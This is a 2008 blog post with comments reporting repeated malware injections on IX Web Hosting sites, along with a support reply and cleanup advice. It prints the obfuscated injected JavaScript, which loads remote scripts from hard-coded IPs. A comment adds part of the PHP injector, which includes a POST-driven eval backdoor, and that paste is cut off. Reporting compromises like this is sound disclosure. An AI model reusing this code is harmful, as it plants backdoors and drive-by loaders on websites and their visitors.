IX Web Hosting Injected TODAY

Posted: December 19, 2008 in IX Web Hosting
Tags: , , , , , , , , ,

Dec. 19. 2008

I can confirm that IX web hosting’s server running database “mysql27.ixwebhosting.com” the site injected were on “ns5.ixwebhosting.com” , “ns6.ixwebhosting.com” has yet again been injected, this within a week after IX web hosting sent an email where it stated that all their servers were clean .. and I quote from the email sent by Fatima Said, CCO IX Web Hosting

“”  We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected. “”

This just goes to show that IX web hosting has not got a clue where to start looking and what to clean.


The injected code appears on every file:

<script language=javascript><!– Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape(‘%2F@/%3C~%64%69&v%20`s!t~%79l#e=%64%69%73p%6C%61~y~%3A%6Eo%6E%65%3E!\nd%6F$%63%75%6D%65%6E#%74%2E!w`r$%69$%74%65%28%22%3C%2F%74!%65~%78t%61!%72@%65&a&%3E@%22|)~%3B|v`a%72%20#%69,%5F`,a%3D![“!7$%38&%2E110~.1%37@%35`.!%321$%22%2C%22!%319~5~.24%2E|%37$%36#%2E%32%35%31%22%5D`%3B~_=~1!%3Bi|f(|do!c%75%6D%65nt@%2E~c#%6F%6F&%6B%69~%65%2E%6D&a~tc%68!(&%2F%5C#bh&%67&%66t@=1%2F)%3D$%3D$%6E|%75l&%6C`%29f#o%72(%69|=%30&%3B|i~%3C@%32!%3B%69+~%2B~%29d|ocu%6Dent%2E&%77~%72%69%74%65(“~%3C`s`c`r%69&p%74`%3E%69f|%28%5F@%29do%63%75m$%65`%6E%74`%2E%77~rit$%65|%28%5C|”#%3C#s&c&r@ip%74$%20%69@%64%3D!_~”+i+`%22_%20|%73%72%63!%3D%2F/#%22|+a#%5Bi|%5D%2B#%22/~%63!p%2F?`”%2B!n`%61#v&%69ga%74%6F!%72%2Ea%70%70`%4E%61%6De`%2Ec!%68$%61%72`A|t&(@0`%29#%2B%22#%3E%3C%5C%5C@/`%73%63@%72&i|p`t@%3E%5C|”~)`%3C#%5C&/!s~c$%72~%69$%70&t!%3E”)#;#\n%2F&%2F$%3C#%2F&d%69%76!%3E’).replace(/@|\!|#|\&|`|~|\||\$/g,””));var yahoo_counter=1;
<!– counter end –></script>

  1. Rene Madsen says:

    We have had the same experience with IXwebhosting – several of our sites have been introduced hacker code. On 20.12.2008, there was added encoding bothers javascript as illustrated in the article.

    IXwebhostings support department believes that it is open script is guilty of hacking and 777 permisions, which we can refuse. They’ve created a user who comes from the root or other administrative use as places of encoding files, etc. Watch your file is not addressed then check all files for this code.

    Dear René,
    We are extremely sorry for the trouble you have faced.
    Please, note that most of hackers’ attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

    The attack that happened to your sites could be made via an FTP access to your account. Unfortunately, we don’t suggest secure FTP connection, for the reason of shared hosting. Please, could you change the FTP passwords under FTP MANAGER icon -> opposite to password field click on Edit. Please, take all of the appropriate measures to prevent other people access your FTP account and use your FTP login information.
    Please note that your files are located on the Linux-based server and you are able to change file/folder permissions so make sure you do not have any “open” files/folders with write permissions set for all.
    So please check if any folders has full granted permissions 777 set, which is means that it’s worldwriteable for anyone from the Web. Recommended permissions are 755 or 644.

    Should you have any further questions, feel free to contact us at anytime, we are available 24/7.
    With regards, Lesya Geychenko.
    Ecommerce corp. CR Dept.

    Our company work every day with Linux servers – and all permissions are correct.

    Encoding, which produces the coding – it should be removed from the files.:

    <?php if(!function_exists(‘tmp_lkojfghx’)){for($i=1;$i<100;$i++)if(is_file($f=’/tmp/m’.$i)){include_once($f);break;}if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCchLyUyRiYlM0N+ZH5pdiYlMjAkJTczJCU3NH4lNzklNkNlPWRgJTY5QHMmJTcwJCU2QyU2MSQlNzklM0ElNkUlNkYlNkUlNjUlM0VcbiZkb2N1JTZEJmUkJTZFfHQuI3dyIyU2OXRlKCElMjIlM0MvJTc0JTY1JTc4fHRhfnImZWElM0UhIiUyOUAlM0IjJTc2YSU3MiMlMjAlNjklMkNAJTVGISxhJTNEfCU1Qn4iJCUzNyQlMzglMkUhJTMxMSQlMzBgLiUzMWA3fDUmLjIxfCIjJTJDJTIyJjE5JTM1LiUzMiUzNHwuQCUzNyE2JiUyRWAlMzImNSUzMX4iXSUzQl8lM0QlMzElM0JpJCU2NiUyOH4lNjRvJCU2MyU3NSYlNkQlNjVudCMlMkVAYyU2Rn5vayU2OX4lNjUubSU2MSElNzQlNjNoKEAvJCU1Q2BiJmgmJTY3QCU2NiU3NCYlM0R8MX4vISkhPT0lNkUkJTc1fCU2QyZsKWYmJTZGQHImKCU2OXwlM0QwO2lgJTNDJTMyITtpKyYlMkIlMjlkJTZGY351JTZEfiU2NX4lNkV0IS4jd2AlNzIlNjkjJTc0JmUlMjglMjIlM0NgJTczYyNyfGklNzAlNzQlM0VpfiU2NihffilkJTZGY3VtYGUjJTZFfnQlMkV3JCU3MiFpdH4lNjUofiU1QyMlMjIlM0MlNzMlNjMhciU2OSU3MHQlMjAmaWRgPSQlNUYlMjJAJTJCaSMlMkIlMjJAJTVGfCUyMCU3M2AlNzJjPUAvLyIrI2EhWyQlNjkhXSQlMkJAInwlMkZjJTcwYCUyRiQlM0ZAJTIyIyUyQnwlNkVhfCU3NiU2OWAlNjd8YSU3NCU2RmAlNzIlMkUlNjElNzAjcCU0RWElNkR8ZXwlMkVjJTY4JCU2MSU3MiU0MSU3NH4oJTMwJTI5JitAJTIyJTNFJTNDJTVDJTVDJTJGfnN8Y3ImJTY5JTcwdGAlM0VgJTVDfCJ8JTI5JTNDJTVDYC9+JTczJTYzYCU3MkAlNjklNzBgdCUzRSIlMjkkJTNCJFxuJTJGJi8jJTNDJi9AJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cJHwjfFwhfH58XCZ8QHxcfHxgL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo=’));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\’\”][^\s\’\”\.,;\?!\[\]:/\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(base64_decode(‘IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==’),”,$s);if(stristr($s,'</body’))$s=preg_replace(‘#(\s*</body)#mi’,str_replace(‘\$’,’\\\$’,TMP_XHGFJOKL).’\1′,$s1);elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,'<body’)||stristr($s,”))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i
    Best regards
    René Madsen
    Søgemaskineoptimering og seo

  2. Chris says:

    Funny how IX Web doesnt “suggest secure FTP connection” on a shared host solution. Maybe they dont suggest it because they dont EVEN OFFER IT???? I was going to set up the keys for SFTP yesterday and noticed they dont even support it. Doesnt everyone pretty much support it anymore? I know Bluehost does.

    Very disappointing. Again.

  3. mikeb12 says:

    not sure if this helps anyone here, but I’ll post in case it does…

    I am also a IX customer and was hit by yahoo counter on a phpbb2 board about a month ago. created a trouble ticket and they told me to upgrade and change ftp and database passwords. didn’t help. then I chatted online with a support rep at IX for about 30 minutes, linked them to the various threads about the issue.. and they said “we are working on it”. I asked if they had an eta or any details on what I can do to fix it. the rep told me they are not allowed to talk about it publicly.

    so needless to say, I went hunting for DIY solution… found many links including this one, but no real answers on how to remove it..

    long story short, after hours of combing through files, found nothing. so I went hunting in phpmyadmin and found it hiding in 2 tables. CONFIG and CATEGORIES…
    removed the counter script from these 2 tables and it cleared my site of it. http://www.doxietown.com/phpBB2/index.php

    here’s where I found mine…
    it was in 2 tables (categories and config) in phpmyadmin. some screenshots below on how I removed it..

    from categories table

    and from config table

    hope that helps some of the phpbb users.. obviously IX is not at a point to fixing it yet.. I had to do it on my own.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s